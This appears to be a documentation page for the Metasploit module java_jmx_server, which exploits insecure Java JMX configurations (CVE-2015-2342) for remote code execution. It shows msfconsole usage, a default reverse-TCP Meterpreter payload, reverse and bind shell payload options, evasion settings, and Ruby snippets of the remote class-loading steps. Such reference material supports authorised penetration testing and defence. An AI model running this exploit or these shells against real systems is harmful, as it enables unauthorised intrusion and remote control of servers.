Java JMX Server Insecure Configuration Java Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/java_jmx_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Java JMX Server Insecure Configuration Java Code Execution
Module: exploit/multi/misc/java_jmx_server
Source code: modules/exploits/multi/misc/java_jmx_server.rb
Disclosure date: 2013-05-22
Last modification time: 2021-01-29 17:59:14 +0000
Supported architecture(s): java
Supported platform(s): Java
Target service / protocol: java-rmi, rmi, rmid, rmiregistry
Target network port(s): 999, 1030, 1035, 1090, 1098, 1099, 1100, 1101, 1102, 1103, 1129, 1199, 1234, 1440, 2199, 2809, 3273, 3333, 3900, 5520, 5521, 5580, 5999, 6060, 6789, 6996, 7700, 7800, 7801, 7878, 7890, 8050, 8051, 8085, 8091, 8205, 8303, 8642, 8686, 8701, 8888, 8889, 8890, 8901, 8902, 8903, 8999, 9001, 9003, 9004, 9005, 9050, 9090, 9099, 9300, 9500, 9711, 9809, 9810, 9811, 9812, 9813, 9814, 9815, 9875, 9910, 9991, 9999, 10001, 10098, 10099, 10162, 11001, 11099, 11333, 12000, 13013, 14000, 15000, 15001, 15200, 16000, 17200, 18980, 20000, 23791, 26256, 31099, 32913, 33000, 37718, 45230, 47001, 47002, 50050, 50500, 50501, 50502, 50503, 50504
List of CVEs: CVE-2015-2342

This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader MBean, etc.).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/misc/java_jmx_server
msf exploit(java_jmx_server) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • RPORT: The target port

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/java_jmx_server exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/java_jmx_server

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_jmx_server) > show info

       Name: Java JMX Server Insecure Configuration Java Code Execution
     Module: exploit/multi/misc/java_jmx_server
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-05-22

Provided by:
  Braden Thomas
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
  JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
  JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT                          yes       The target port (TCP)
  SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT       8080             yes       The local port to listen on.
  SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                        no        The URI to use for this exploit (default is random)

Payload information:
  Avoid: 0 characters

Description:
  This module takes advantage a Java JMX interface insecure 
  configuration, which would allow loading classes from any remote 
  (HTTP) URL. JMX interfaces with authentication disabled 
  (com.sun.management.jmxremote.authenticate=false) should be 
  vulnerable, while interfaces with authentication enabled will be 
  vulnerable only if a weak configuration is deployed (allowing to use 
  javax.management.loading.MLet, having a security manager allowing to 
  load a ClassLoader MBean, etc.).

References:
  https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf
  https://www.optiv.com/blog/exploiting-jmx-rmi
  https://nvd.nist.gov/vuln/detail/CVE-2015-2342

Module Options


This is a complete list of options available in the multi/misc/java_jmx_server exploit:

msf6 exploit(multi/misc/java_jmx_server) > show options

Module options (exploit/multi/misc/java_jmx_server):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                          yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/java_jmx_server exploit:

msf6 exploit(multi/misc/java_jmx_server) > show advanced

Module advanced options (exploit/multi/misc/java_jmx_server):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RmiReadLoopTimeout      1                yes       Maximum number of seconds to wait for data between read iterations
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/java_jmx_server module can exploit:

msf6 exploit(multi/misc/java_jmx_server) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (Java Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/java_jmx_server exploit:

msf6 exploit(multi/misc/java_jmx_server) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/java_jmx_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/java_jmx_server) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to negotiate RMI protocol


Here is a relevant code snippet related to the "<PEER> - Failed to negotiate RMI protocol" error message:

134:	    @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
135:	    connect
136:	
137:	    print_status("Sending RMI Header...")
138:	    unless is_rmi?
139:	      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
140:	    end
141:	
142:	    print_status("Discovering the JMXRMI endpoint...")
143:	    mbean_server = discover_endpoint
144:	    disconnect

<PEER> - Failed to discover the JMXRMI endpoint


Here is a relevant code snippet related to the "<PEER> - Failed to discover the JMXRMI endpoint" error message:

141:	
142:	    print_status("Discovering the JMXRMI endpoint...")
143:	    mbean_server = discover_endpoint
144:	    disconnect
145:	    if mbean_server.nil?
146:	      fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
147:	    else
148:	      print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
149:	    end
150:	
151:	    # First try to connect to the original RHOST, since the mbean address may be inaccessible

<PEER> - Failed to negotiate RMI protocol with the MBean server


Here is a relevant code snippet related to the "<PEER> - Failed to negotiate RMI protocol with the MBean server" error message:

155:	      # If that fails, try connecting to the listed address instead
156:	      connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
157:	    end
158:	
159:	    unless is_rmi?
160:	      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
161:	    end
162:	
163:	    print_status("Proceeding with handshake...")
164:	    jmx_endpoint = handshake(mbean_server)
165:	    if jmx_endpoint.nil?

<PEER> - Failed to handshake with the MBean server


Here is a relevant code snippet related to the "<PEER> - Failed to handshake with the MBean server" error message:

161:	    end
162:	
163:	    print_status("Proceeding with handshake...")
164:	    jmx_endpoint = handshake(mbean_server)
165:	    if jmx_endpoint.nil?
166:	      fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
167:	    else
168:	      print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
169:	    end
170:	
171:	    print_status("Loading payload...")

<PEER> - Failed to load the payload


Here is a relevant code snippet related to the "<PEER> - Failed to load the payload" error message:

168:	      print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
169:	    end
170:	
171:	    print_status("Loading payload...")
172:	    unless load_payload(jmx_endpoint)
173:	      fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
174:	    end
175:	
176:	    print_status("Executing payload...")
177:	    send_jmx_invoke(
178:	      object_number: jmx_endpoint[:object_number],

JMXRMI discovery returned unexpected object <REF:OBJECT>


Here is a relevant code snippet related to the "JMXRMI discovery returned unexpected object <REF:OBJECT>" error message:

212:	    ]
213:	    ref = send_registry_lookup(name: datastore['JMXRMI'])
214:	    return nil if ref.nil?
215:	
216:	    unless rmi_classes_and_interfaces.include? ref[:object]
217:	      vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}")
218:	      return nil
219:	    end
220:	
221:	    ref
222:	  end

JMXRMI discovery raised an exception of type <E.MESSAGE>


Here is a relevant code snippet related to the "JMXRMI discovery raised an exception of type <E.MESSAGE>" error message:

236:	        opts.merge!(username: username, password: password)
237:	      end
238:	
239:	      ref = send_new_client(opts)
240:	    rescue ::Rex::Proto::Rmi::Exception => e
241:	      vprint_error("JMXRMI discovery raised an exception of type #{e.message}")
242:	      return nil
243:	    end
244:	
245:	    ref
246:	  end

JMXPayload instance not found, trying to load


Here is a relevant code snippet related to the "JMXPayload instance not found, trying to load" error message:

257:	        name: "#{@mlet}:name=jmxpayload,id=1"
258:	      )
259:	    rescue ::Rex::Proto::Rmi::Exception => e
260:	      case e.message
261:	      when 'javax.management.InstanceNotFoundException'
262:	        vprint_warning("JMXPayload instance not found, trying to load")
263:	        return load_payload_from_url(conn_stub)
264:	      else
265:	        vprint_error("getObjectInstance returned unexpected exception #{e.message}")
266:	        return false
267:	      end

getObjectInstance returned unexpected exception <E.MESSAGE>


Here is a relevant code snippet related to the "getObjectInstance returned unexpected exception <E.MESSAGE>" error message:

260:	      case e.message
261:	      when 'javax.management.InstanceNotFoundException'
262:	        vprint_warning("JMXPayload instance not found, trying to load")
263:	        return load_payload_from_url(conn_stub)
264:	      else
265:	        vprint_error("getObjectInstance returned unexpected exception #{e.message}")
266:	        return false
267:	      end
268:	    end
269:	
270:	

The provided user hasn't enough privileges


Here is a relevant code snippet related to the "The provided user hasn't enough privileges" error message:

288:	      case e.message
289:	      when 'javax.management.InstanceAlreadyExistsException'
290:	        vprint_good("javax.management.loading.MLet already exists")
291:	        res = true
292:	      when 'java.lang.SecurityException'
293:	        vprint_error(" The provided user hasn't enough privileges")
294:	        res = nil
295:	      else
296:	        vprint_error("createMBean raised unexpected exception #{e.message}")
297:	        res = nil
298:	      end

createMBean raised unexpected exception <E.MESSAGE>


Here is a relevant code snippet related to the "createMBean raised unexpected exception <E.MESSAGE>" error message:

291:	        res = true
292:	      when 'java.lang.SecurityException'
293:	        vprint_error(" The provided user hasn't enough privileges")
294:	        res = nil
295:	      else
296:	        vprint_error("createMBean raised unexpected exception #{e.message}")
297:	        res = nil
298:	      end
299:	    end
300:	
301:	    if res.nil?

The request to createMBean failed


Here is a relevant code snippet related to the "The request to createMBean failed" error message:

297:	        res = nil
298:	      end
299:	    end
300:	
301:	    if res.nil?
302:	      vprint_error("The request to createMBean failed")
303:	      return false
304:	    end
305:	
306:	    vprint_status("Getting javax.management.loading.MLet instance...")
307:	    begin

getObjectInstance returned unexpected exception: <E.MESSAGE>


Here is a relevant code snippet related to the "getObjectInstance returned unexpected exception: <E.MESSAGE>" error message:

311:	        uid_time: conn_stub[:uid].time,
312:	        uid_count: conn_stub[:uid].count,
313:	        name: 'DefaultDomain:type=MLet'
314:	      )
315:	    rescue ::Rex::Proto::Rmi::Exception => e
316:	      vprint_error("getObjectInstance returned unexpected exception: #{e.message}")
317:	      return false
318:	    end
319:	
320:	    if res.nil?
321:	      vprint_error("The request to GetObjectInstance failed")

The request to GetObjectInstance failed


Here is a relevant code snippet related to the "The request to GetObjectInstance failed" error message:

316:	      vprint_error("getObjectInstance returned unexpected exception: #{e.message}")
317:	      return false
318:	    end
319:	
320:	    if res.nil?
321:	      vprint_error("The request to GetObjectInstance failed")
322:	      return false
323:	    end
324:	
325:	    vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
326:	

invoke() returned unexpected exception: <E.MESSAGE>


Here is a relevant code snippet related to the "invoke() returned unexpected exception: <E.MESSAGE>" error message:

333:	        object: 'DefaultDomain:type=MLet',
334:	        method: 'getMBeansFromURL',
335:	        args: { 'java.lang.String' => "#{get_uri}/mlet" }
336:	      )
337:	    rescue ::Rex::Proto::Rmi::Exception => e
338:	      vprint_error("invoke() returned unexpected exception: #{e.message}")
339:	      return false
340:	    end
341:	
342:	    if res.nil?
343:	      vprint_error("The call to getMBeansFromURL failed")

The call to getMBeansFromURL failed


Here is a relevant code snippet related to the "The call to getMBeansFromURL failed" error message:

338:	      vprint_error("invoke() returned unexpected exception: #{e.message}")
339:	      return false
340:	    end
341:	
342:	    if res.nil?
343:	      vprint_error("The call to getMBeansFromURL failed")
344:	      return false
345:	    end
346:	
347:	    true
348:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Braden Thomas
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.